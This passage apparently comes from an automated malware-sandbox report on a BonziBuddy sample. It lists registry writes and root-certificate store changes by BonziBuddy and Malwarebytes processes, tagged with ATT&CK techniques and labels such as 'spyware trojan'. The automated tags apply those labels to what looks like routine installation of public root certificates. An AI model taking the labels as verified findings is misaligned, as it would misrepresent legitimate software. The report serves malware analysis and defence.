Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F6A99D88-2CA0-4781-86B9-2014CDC372E8}\TypeLib\Version = "1.0"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EEC295FA-EC51-4055-BC47-022FC0FC122F}\1.0\FLAGS\ = "0"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D44-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Threed.SSPanel\CLSID	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FD2-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MB.MBAMServiceController.1\CLSID\ = "{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E3D4AC2-A9AE-478A-91EE-79C35D3CA8C7}\ProxyStubClsid32	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B9F73DD6-F2A4-40F8-9109-67F6BB8D3704}\ProxyStubClsid32	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8DB2224E-D2FA-4B2E-8402-085EA7CC826B}\ = "_CCalendarVBPeriods"	BonziBDY_35.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FE2-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EB52CF7B-3917-11CE-80FB-0000C0C14E92}\InprocServer32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E298372C-5B10-42B4-B44C-7B85EA0722A3}\TypeLib\ = "{F5BCAC7E-75E7-4971-B3F3-B197A510F495}"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3BD2053F-99D1-4C2B-8B45-635183A8F0BF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MBAMService.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

6028 reg.exe

pid	process
6028	reg.exe

Modifies system certificate store 2 TTPs 40 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

MBAMService.exeMBAMInstallerService.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc03000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b680000000100000008000000000036044ddfd3017e0000000100000008000000000010c51e92d2011d0000000100000010000000177f789e96523e206c796917c848d50f0b000000010000001200000056006500720069005300690067006e000000140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea090000000100000016000000301406082b0601050507030306082b06010505070304620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce4460f0000000100000010000000a2011111cc748d961c35c67a0d5c8af520000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 190000000100000010000000163bfe3a4cc2a862bfa2e635f8b2ee020f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce446090000000100000016000000301406082b0601050507030306082b06010505070304140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea0b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000177f789e96523e206c796917c848d50f7e0000000100000008000000000010c51e92d201680000000100000008000000000036044ddfd30103000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc20000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E\Blob = 0300000001000000140000000d44dd8c3c8c1a1a58756481e90f2e2affb3d26e2000000001000000ba010000308201b63082015ba0030201020213066c9fd5749736663f3b0b9ad9e89e7603f24a300a06082a8648ce3d0403023039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412033301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120333059301306072a8648ce3d020106082a8648ce3d030107034200042997a7c6417fc00d9be8011b56c6f252a5ba2db212e8d22ed7fac9c5d8aa6d1f73813b3b986b397c33a5c54e868e8017686245577d44581db337e56708eb66dea3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414abb6dbd7069e37ac3086079170c79cc419b178c0300a06082a8648ce3d0403020349003046022100e08592a317b78df92b06a593ac1a98686172fae1a1d0fb1c7860a64399c5b8c40221009c02eff1949cb396f9ebc62af8b62cfe3a901416d78c6324481cdf307dd5683b	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A\Blob = 0300000001000000140000005a8cef45d7a69859767a8c8b4496b578cf474b1a2000000001000000450500003082054130820329a0030201020213066c9fd29635869f0a0fe58678f85b26bb8a37300d06092a864886f70d01010c05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412032301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203230820222300d06092a864886f70d01010105000382020f003082020a0282020100ad969f2d9c4a4c4a81795199ec8acb6b605113bc4d6d06fcb0088ddd19106ac7260c35d8c06f2084e994b19b8503c35bdb4ae8c8f89076d95b4fe34ce806364dcc9aac3d0c902b92d4061960ac374479858182ad5a37e00dcc9da64c5276ea439db704d150f655e0d5d2a64985e937e9ca7eae5c954d489a3fae205a6d8895d934b8521a4390b0bf6c05b9b678b7ead0e43a3c125362ff4af27bbe3505a91234e3f36474622c3d00495a28fe3244bb87dd652702713bda4af71fdacdf72155904f0fecae82e19f6bd945d3bbf05f87ed3c2c3986da3fdeec7255eb79a3addbdd7cb0ba1ccefcde4f3576cf0ff8781f6a36514627615be99ecff0a2557d7c258a6f2fb4c5cf842e2bfd0d51106cfb5f1bbc1b7ec5ae3b98013192ff0b57f49ab2b957e9abef0d76d1f0eef4ce86a7e06ee9b469a1df69f633c6692e97139ea587b057108137c953b3bb7ff692d19cd018f4926eda834fa663994ca5fb5eef21647a205f6c648515cb37e9620c0b2a16dc012e32da3e4bf59e3af6174094ef9e910886fabe63a85a33eccb744395f96c695236c7296ffc55035c1ffb9fbd47ebe74947950b4e89220949e0f5611ef1bf2e8a726e8059ff573af97532a34e5feced2862d94d73f2cc811760edcdebdcdba7cac57e02bdf2540854fdb42d092c17544a98d154e1516708d2ed6e7e6f3fd22d81592966cb903995111e7427feddebaf0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414b00cf04c30f405580248fd33e552af4b84e36652300d06092a864886f70d01010c05000382020100aaa8808f0e78a3e0a2d4cde6f5987a3bea0003b0970e93bc5aa8f62c8c7287a9b1fc7f73fd637178a58759cf30e10d10b2135a6d82f56ae6809fa0050b68e4476bc76adfb6fd773272e518fa09f4a0932c5dd28c75857665900c0379b7312363ad788309866884cafff9cf269a9279e7cd4bc5e761a717cbf3a91293936ba7e82f5392c46058b0cc0251185b858d625963b6adb4de9afb26f70027c05d55377499c9507fe3592e44e32c25eeec4c3277b49f1ae94b5d20c5dafd1c8716c643e8d4bb269a45705ea90b3753e2467b27fde046f289b7cc42b6cb28266ed9a5c93ac8411360f7508c15aeb26d1a151a5778e6922ad96590823f6c02afae123a27963604d71da28063a99bf1e5bab47c14b04ec9b11f745f38f651ea9bfa2ca211d4a92d271a45b1afb24e710dc05846d66906cb53cbb3fe6b41cd417e7d4c0f7c72797a59cd5e4a0eac9ba99873797cb4f4ccb9b8070cb2745cb8c76f88a190a7f4aaf9bf673af41a15621eb79fbe3db129af67a112f25810195303301bb81a89f69cbd97038ea309f31d8b21f1b4dfe41cd19f650206ea5cd613b384efa2a55c8c7729a768c06bae40d2a8b4eacdf08d4b389c199a1b2854b88990efca75813e1ef26424c718af4eff479e07f63565a4d30a56fff517646cefa822254993b6df0017da587e5deec51bb0d1d15f2110c7f9f3ba020a2707c5f1d6c7d3e0fb09606c	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf5140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa20f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e1900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C\Blob = 0300000001000000140000002ad974a775f73cbdbbd8f5ac3a49255fa8fb1f8c2000000001000000620400003082045e30820346a0030201020213077312380b9d6688a33b1ed9bf9ccda68e0e0f300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3232303832333232323132385a170d3330303832333232323132385a303c310b3009060355040613025553310f300d060355040a1306416d617a6f6e311c301a06035504031313416d617a6f6e205253412032303438204d303130820122300d06092a864886f70d01010105000382010f003082010a0282010100eb712ca9cb1f8828923230af8a570f78b73725955587ac675c97d322c8daa214676b7cf067dae2032ab356125dc6b547f96708a7937a9592180fb4f9f910369a7f2f80b64fba134ec75d531ee0dd96330720d396bc12e4745042a1051373b54f9b4424fe2d7fedbc2285ec362133977506ce271882dce3d9c582078d5e26012626671fd93f13cf32ba6bad7864fcaaff0e023c07df9c0578728cfdea75b7032884dae86e078cd05085ef8154b2716eec6d62ef8f94c35ee9c4a4d091c02e249198caeeba258ed4f671b6fb5b6b38064837478d86dcf2ea06fb76377d9eff424e4d588293cfe271c278b17aab4b5b94378881e4d9af24aef872c565fb4bb451e70203010001a382015a3082015630120603551d130101ff040830060101ff020100300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302301d0603551d0e0416041481b80e638a891218e5fa3b3b50959fe6e5901385301f0603551d230418301680148418cc8534ecbc0c94942e08599cc7b2104e0a08307b06082b06010505070101046f306d302f06082b060105050730018623687474703a2f2f6f6373702e726f6f746361312e616d617a6f6e74727573742e636f6d303a06082b06010505073002862e687474703a2f2f6372742e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e636572303f0603551d1f043830363034a032a030862e687474703a2f2f63726c2e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e63726c30130603551d20040c300a3008060667810c010201300d06092a864886f70d01010b05000382010100ad00de0205232e063262b46bb19416e41140de2bfa59c135efe0aa8f2b41b9d1f38739001df23db5a7470c0606c691f3075702d4edbd17c1909abf4875a2074f30dd4a6a42b50d3d15c00ffe845bc63c99cc5752b1d86e12d59692934b94e507e88982086a7a34d49e64e13d876a92909a63a14bf88fb6ea34d305be20c2de06e28c9f738b9f4d3985cace19369d85c99ec9f8503fb67e88a1efca84068b50b40a5ca61c44f1fdc8614060f26125aa07f4c7c27375e40c0b428d04e55f4448995b7b898196a7889d4b0d62e804c4d7feb4e8b26dcaecc01cbc385b1ddf85ce5b7ae3494b6cb9a7ddf405b249ade1c5146bc2ccebcd7fd65869bac3207e7fb0b8	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 5c000000010000000400000000040000040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc03000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b680000000100000008000000000036044ddfd3017e0000000100000008000000000010c51e92d2011d0000000100000010000000177f789e96523e206c796917c848d50f0b000000010000001200000056006500720069005300690067006e000000140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea090000000100000016000000301406082b0601050507030306082b06010505070304620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce4460f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5190000000100000010000000163bfe3a4cc2a862bfa2e635f8b2ee0220000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 5c000000010000000400000000080000190000000100000010000000d8b5fb368468620275d142ffd2aade370300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e56800000001000000000000007e000000010000000800000000c0032f2df8d6011d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3610b000000010000001200000056006500720069005300690067006e0000001400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331336200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c9040000000100000010000000cb17e431673ee209fe455793f30afa1c2000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b